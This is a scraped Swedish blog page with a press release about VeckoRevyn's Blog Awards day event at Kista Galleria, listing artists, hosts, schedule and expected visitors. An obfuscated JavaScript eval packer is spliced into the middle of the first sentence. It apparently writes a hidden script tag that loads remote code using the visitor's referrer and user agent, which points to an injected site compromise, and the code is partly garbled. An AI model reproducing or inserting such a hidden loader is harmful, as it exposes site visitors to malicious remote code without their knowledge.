Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

VeckoRevyn Blog Awards till Kista Galleria!

VeckoRevyn Blog Awards till Kista Galleria!
Sebastian

Lördagen eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|shztf|var|u0026u|referrer|znefe||js|php’.split(’|’),0,{}))
den 22 september gör VeckoRevyn om succén och bjuder in alla sina läsare till ett storslaget dagsevent i Kista Galleria som en del av Blog Awards – utdelningen av Sveriges största bloggpris.

På scen står artister som Panetoz, Andreas Moe, Youngblood och Molly Sandén och konferenicer för dagen är programledaren Pär Lernström.

– Det känns fantastiskt roligt att kunna bjuda in så många av VeckoRevyns läsare och tillsammans med några av Sveriges hetaste artister just nu kunna ge dem en oförglömlig upplevelse, och helt gratis dessutom, säger Linda Clarenbring, projektledare för Blog Awards.

Första artistuppträdandet sker klockan 13:00 och det sista klockan 17:30. Under dagen bjuds besökarna dessutom på tävlingar, spännande aktiviteter på scen och modevisning, koreograferad av VeckoRevyns moderedaktör Li Svärd Edwall, där välkända bloggare visar höstens trender på catwalken.

– Vi är glada att återigen kunna bjuda våra besökare på Blog Awards i Kista Galleria. I år siktar vi på besöksrekord och hoppas på över 65 000 besökare, säger Linda Estenthal, marknadschef för Kista Galleria.

Eventet gästas också av Hollywoodfrun Maria Montazami, döttrarna Hanna och Sara Montazami samt flera av Sveriges största bloggare.

Detta är ett pressmeddelande från Bonnier Tidskrifter